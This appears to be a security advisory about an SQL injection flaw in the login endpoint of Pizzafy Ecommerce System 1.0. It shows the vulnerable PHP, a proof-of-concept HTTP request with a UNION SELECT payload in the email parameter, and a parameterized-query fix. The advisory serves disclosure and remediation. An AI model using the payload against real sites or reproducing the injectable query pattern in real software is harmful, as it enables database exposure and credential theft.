Pizzafy Ecommerce System 1.0 Login SQL Injection Vulnerability Analysis

# Vulnerability Summary: SQL Injection Vulnerability in Pizzafy Ecommerce System 1.0 ## Vulnerability Overview - **Vulnerability Type**: Error-Based SQL Injection - **Severity**: HIGH - **Affected Version**: Pizzafy Ecommerce System 1.0 - **Vulnerability Location**: The `email` parameter in the login functionality is not properly filtered, allowing malicious SQL commands to be injected into backend database queries. - **Vulnerable Endpoint**: `/pizzafy/admin/ajax.php?action=login2` ## Impact Scope | Impact Dimension | Description | |------------------|-------------| | Confidentiality | Full exposure of database structure and user credentials | | Integrity | Unauthorized deletion or modification of records | | Availability | Service unavailability due to large-scale data deletion | | Privilege Escalation | Gaining administrator privileges via session data hijacking | ## Remediation Steps 1. **Use Prepared Statements**: Implement parameterized queries to prevent SQL injection. 2. **Input Validation**: Strictly validate and filter the `email` and `password` parameters. 3. **Database Permission Restrictions**: Limit database user privileges to minimize potential damage. 4. **Monitoring and Logging**: Track and alert on anomalous query patterns. 5. **Security Testing**: Conduct regular penetration testing and code reviews. 6. **Error Handling**: Avoid exposing database-related error messages in responses. ## Vulnerable Code ```php public function login2() { $username = isset($_POST['email']) ? $_POST['email'] : ''; $password = isset($_POST['password']) ? $_POST['password'] : ''; $sql = "SELECT * FROM user_info WHERE email = '$username'"; $qry = $this->conn->query($sql); if (!$qry) { return $this->conn->error; } if ($qry && $qry->num_rows > 0) { $row = $qry->fetch_assoc(); if (password_verify($password, $row['password'])) { $_SESSION['login_user_id'] = $row['user_id']; $_SESSION['login_first_name'] = $row['first_name']; $_SESSION['login_last_name'] = $row['last_name']; return 1; } return json_encode($row); } else { return 2; } } ``` ## Proof of Concept (POC) ```http POST /pizzafy/admin/ajax.php?action=login2 HTTP/1.1 Host: localhost Content-Length: 64 sec-ch-ua: Accept: */* Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36 sec-ch-ua-platform: "" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/pizzafy/index.php Accept-Encoding: gzip, deflate Accept-Language: pt-BR,pt-BR;q=0.9,en-US;q=0.8,en;q=0.7 Cookie: PHPSESSID=1fNk520basr12j78p8kcbg9d649 Connection: close email=3' union select 1,version(),database(),user(),5,6,7&23&password=teste ``` ## Remediated Code ```php public function login2() { $username = isset($_POST['email']) ? $_POST['email'] : ''; $password = isset($_POST['password']) ? $_POST['password'] : ''; $stmt = $this->conn->prepare("SELECT * FROM user_info WHERE email = ?"); $stmt->bind_param("s", $username); $stmt->execute(); $qry = $stmt->get_result(); if (!$qry) { return $this->conn->error; } if ($qry && $qry->num_rows > 0) { $row = $qry->fetch_assoc(); if (password_verify($password, $row['password'])) { $_SESSION['login_user_id'] = $row['user_id']; $_SESSION['login_first_name'] = $row['first_name']; $_SESSION['login_last_name'] = $row['last_name']; return 1; } } else { return 2; } } ```

Goal Reached Thanks to every supporter — we hit 100%!

Pizzafy Ecommerce System 1.0 Login SQL Injection Vulnerability Analysis

More from this source